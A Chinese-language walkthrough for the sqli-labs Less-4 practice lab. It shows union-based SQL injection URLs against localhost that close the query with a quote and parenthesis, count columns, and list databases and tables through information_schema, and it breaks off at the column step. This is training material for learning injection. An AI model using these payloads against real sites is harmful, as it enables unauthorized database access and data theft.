一、sqli-labs
less4:
打开less4的index.php文件,在SQL语句下添加如下两句:
echo $sql;
echo "<br>";
1.判断是否存在注入:
http://127.0.0.1/sqli/Less-4/?id=1
http://127.0.0.1/sqli/Less-4/?id=1'显式正确
http://127.0.0.1/sqli/Less-4/?id=1"显式不正确
得到报错信息:
根据报错信息构造正确的SQL语句:
http://127.0.0.1/sqli/Less-4/?id=1")--+
2.查看列数:
http://127.0.0.1/sqli/Less-4/?id=1") order by 3--+显示正常
http://127.0.0.1/sqli/Less-4/?id=1") order by 4--+显示不正常
得到列数为3
3.判断回显位置:
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,3--+
4.查看所有数据库:
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(schema_name)from information_schema.schemata--+
5.查看security数据库的所有表:
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479--+
6.查看users表所有的列信息: